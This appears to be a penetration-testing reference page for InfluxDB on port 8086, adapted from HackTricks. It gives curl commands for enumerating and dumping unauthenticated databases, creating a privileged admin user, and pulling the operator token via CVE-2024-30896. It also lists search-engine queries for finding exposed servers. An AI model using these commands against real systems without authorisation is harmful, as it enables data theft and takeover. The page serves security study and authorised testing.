--- title: "8086 - Influxdb" weight: 8086 date: "2026-03-10T10:03:28+08:00" lastmod: "2026-03-10T13:26:55+08:00" --- 💡 **学习提示**: 本文档介绍 **8086 - InfluxDB** 的渗透测试方法,适合信息安全初学者和从业人员参考。 ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 --- ``` If you **get an error like** this one: `ERR: unable to parse authentication credentials` it means that it's **expecting some credentials**. ``` influx –username influx –password influx_pass ``` There was a vulnerability influxdb that allowed to bypass the authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-利用-CVE-2019-20933) #### Manual 信息收集 (v1 HTTP API / InfluxQL) Even when no CLI is available, the HTTP API is usually exposed on port 8086. ```bash ## List databases (unauth) curl -sG "http://:8086/query" --data-urlencode "q=SHOW DATABASES" ## List retention policies of a DB curl -sG "http://:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf" ## List users (if auth disabled) curl -sG "http://:8086/query" --data-urlencode "q=SHOW USERS" ## List measurements (tables) curl -sG "http://:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS" ## List field keys (columns) curl -sG "http://:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS" ## Dump data from a measurement curl -sG "http://:8086/query" \ --data-urlencode "db=telegraf" \ --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq . ## Force epoch timestamps (useful for tooling) curl -sG "http://:8086/query" \ --data-urlencode "epoch=ns" \ --data-urlencode "db=telegraf" \ --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' ``` > [!WARNING] > In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"` If authentication is disabled, you can even create users and escalate: ```bash ## Create an admin user (v1, auth disabled) curl -sG "http://:8086/query" \ --data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES" ``` The information of the following CLI example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/). #### Show databases The found databases are `telegraf` and `internal` (you will find this one everywhere) ```bash > show databases name: databases name ---- telegraf _internal ``` #### Show tables/measurements The [**InfluxDB documentation**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) explains that **measurements** in InfluxDB can be paralleled with SQL tables. The nomenclature of these **measurements** is indicative of their respective content, each housing data relevant to a particular entity. ```bash > show measurements name: measurements name ---- cpu disk diskio kernel mem processes swap system ``` #### Show columns/field keys The field keys are like the **columns** of the database ```bash > show field keys name: cpu fieldKey fieldType -------- --------- usage_guest float usage_guest_nice float usage_idle float usage_iowait float name: disk fieldKey fieldType -------- --------- free integer inodes_free integer inodes_total integer inodes_used integer [ ... more keys ...] ``` #### Dump Table And finally you can **dump the table** doing something like ```bash select * from cpu name: cpu time cpu host usage_guest usage_guest_nice usage_idle usage_iowait usage_irq usage_nice usage_softirq usage_steal usage_system usage_user ---- --- ---- ----------- ---------------- ---------- ------------ --------- ---------- ------------- ----------- ------------ ---------- 1497018760000000000 cpu-total ubuntu 0 0 99.297893681046 0 0 0 0 0 0.35105315947842414 0.35105315947842414 1497018760000000000 cpu1 ubuntu 0 0 99.69909729188728 0 0 0 0 0 0.20060180541622202 0.10030090270811101 ``` #### InfluxDB v2.x API (Token-based) InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate: ```bash ## Basic org, bucket, and auth discovery TOKEN=""; H="-H Authorization: Token $TOKEN" ## Health & version curl -s http://:8086/health | jq . ## List organizations curl -s $H http://:8086/api/v2/organizations | jq . ## List buckets curl -s $H 'http://:8086/api/v2/buckets?limit=100' | jq . ## List authorizations (requires perms) ORGID= curl -s $H "http://:8086/api/v2/authorizations?orgID=$ORGID" | jq . ## Query data with Flux curl -s $H -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \ -X POST http://:8086/api/v2/query \ --data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)' ``` Notes - For v1.8+, some v2-compatible endpoints exist (`/api/v2/query`, `/api/v2/write`, `/health`). This is useful if the server is v1 but accepts v2-style requests. - In v2, the HTTP `授权` header must be in the form `Token `. #### Automated 信息收集 ```bash msf6 > use auxiliary/scanner/http/influxdb_enum ``` #### Recent vulns and privesc of interest (last years) - InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via `influx auth ls` or `GET /api/v2/authorizations`). With that token, the attacker can administrate the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org. Quick test: ```bash ## Using a low-priv/all-access token tied to the default org curl -s -H 'Authorization: Token ' \ 'http://:8086/api/v2/authorizations?orgID=' | jq . ## Look for entries of type "operator" and extract the raw token (if present) ``` - Many legacy 1.x deployments still expose `/query` and `/write` unauthenticated on the Internet. If auth is disabled, you can dump or even modify time-series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you. --- ### 搜索引擎语法 #### FOFA ```bash # FOFA 搜索语法 port="8086" ``` #### Shodan ```bash # Shodan 搜索语法 port:8086 ``` #### ZoomEye ```bash # ZoomEye 搜索语法 port:8086 ``` --- ## 📖 参考资料 - [HackTricks - 8086-influxdb](https://book.hacktricks.wiki/en/network-services-pentesting/8086-influxdb.html)